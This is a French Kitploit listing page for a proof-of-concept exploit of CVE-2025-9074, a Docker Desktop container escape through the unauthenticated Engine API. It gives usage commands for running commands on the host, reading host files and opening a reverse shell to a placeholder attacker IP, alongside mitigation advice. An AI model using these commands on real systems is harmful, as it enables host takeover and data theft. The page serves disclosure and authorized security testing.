Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — Preuve de concept d'exploitation pour CVE-2025-9074 - Échappement de conteneur via l'API Docker Engine non authentifiée affectant Docker Desktop < 4.44.3 sur Windows et macOS (CVSS 9.3) | Kitploit
Outils/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité CloudRed TeamingÉvasion de Conteneur
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-9074-Docker-Desktop-Container-Escape

Preuve de concept d'exploitation pour CVE-2025-9074 - Échappement de conteneur via l'API Docker Engine non authentifiée affectant Docker Desktop < 4.44.3 sur Windows et macOS (CVSS 9.3)

Voir le dépôt
24il y a 9 moisPas encore vérifié

CVE-2025-9074 : Preuve de concept d'évasion de conteneur Docker Desktop

CVE CVSS Platform

Preuve de concept d'exploitation pour CVE-2025-9074 – une vulnérabilité d'évasion de conteneur critique dans Docker Desktop qui permet un accès non authentifié à l'API du moteur Docker.

Présentation de la vulnérabilité

PropriétéValeur
ID CVECVE-2025-9074
Score CVSS9,3 (Critique)
Logiciel concernéDocker Desktop < 4.44.3
Plateformes concernéesWindows, macOS (Linux NON concerné)
Version corrigéeDocker Desktop 4.44.3+
DécouvreursFelix Boulet, Philippe Dugré
Date de découverteMi-2025
Date du correctif20 août 2025

Détails techniques

La vulnérabilité permet aux conteneurs fonctionnant sous Docker Desktop d'accéder à l'API du moteur Docker à http://192.168.65.7:2375 sans authentification. Cela se produit indépendamment :

  • Des paramètres d'isolation renforcée des conteneurs (ECI)
  • De la configuration « Exposer le démon sur tcp://localhost:2375 sans TLS »
  • De tout autre paramètre de sécurité

Impact

  • Windows (backend WSL) : Prise de contrôle complète de l'hôte avec privilèges administratifs
  • macOS : Manipulation de conteneurs et possible backdooring (limité par les invites utilisateur)
  • Linux : Non vulnérable (utilise un socket Unix au lieu de TCP)

Cause racine

L'API du moteur Docker était exposée sur un socket TCP accessible depuis les conteneurs, permettant :

  • La création/suppression de conteneurs
  • Le montage de systèmes de fichiers de l'hôte
  • L'exécution de commandes privilégiées
  • Le contournement complet de l'isolation des conteneurs

Utilisation

image

Prérequis

root@kitploit:~
pip3 install requests

Mode exécution de commandes

root@kitploit:~
# Exécuter une commande sur l'hôte
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Lire des fichiers depuis un hôte Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrateur/Desktop/root.txt"

# Lister les utilisateurs sur Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

Mode shell inversé

root@kitploit:~
# Terminal 1 : Mettre en place un écouteur
nc -lvnp 4444

# Terminal 2 : Exécuter l'exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <VOTRE_IP> -p 4444

# Une fois connecté, le système de fichiers hôte se trouve à : /hostfs

Depuis l'intérieur d'un conteneur

root@kitploit:~
# Si vous avez déjà accès à un conteneur
curl http://192.168.65.7:2375/version

Scénario d'attaque

root@kitploit:~
graph TD
    A[Conteneur malveillant] -->|Aucune authentification requise| B[API du moteur Docker<br/>192.168.65.7:2375]
    B -->|Créer un conteneur| C[Conteneur privilégié]
    C -->|Monter le FS hôte| D[Accès complet à l'hôte]
    D -->|Lecture/Écriture| E[Compromettre le système]

Atténuation

Action immédiate requise

Mettez à jour Docker Desktop vers la version 4.44.3 ou une version ultérieure immédiatement.

root@kitploit:~
# Vérifier votre version de Docker Desktop
docker --version

# Mettre à jour Docker Desktop
# Windows : Télécharger depuis https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS : Télécharger depuis https://desktop.docker.com/mac/main/amd64/Docker.dmg

Solutions de contournement (temporaires)

Si une mise à jour immédiate n'est pas possible :

  1. Évitez d'exécuter des conteneurs non fiables
  2. Surveillez les connexions réseau depuis les conteneurs
  3. Mettez en place une segmentation réseau
  4. Examinez toutes les images de conteneurs avant déploiement

Références

  • Avis de sécurité Docker
  • NVD CVE-2025-9074
  • Blog de Felix Boulet
  • Analyse de Philippe Dugré
  • Avis GitHub

Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

  • Utilisez-le uniquement contre des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite
  • L'accès non autorisé à des systèmes informatiques est illégal
  • Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de ce logiciel

Crédits

  • Découverte de la vulnérabilité : Felix Boulet, Philippe Dugré
  • Développement de la preuve de concept : Amanja Francisco
  • Équipe de sécurité Docker : Pour la rapidité de réaction et le correctif

Licence

Licence MIT – Voir le fichier LICENSE pour plus de détails

Télécharger l’outil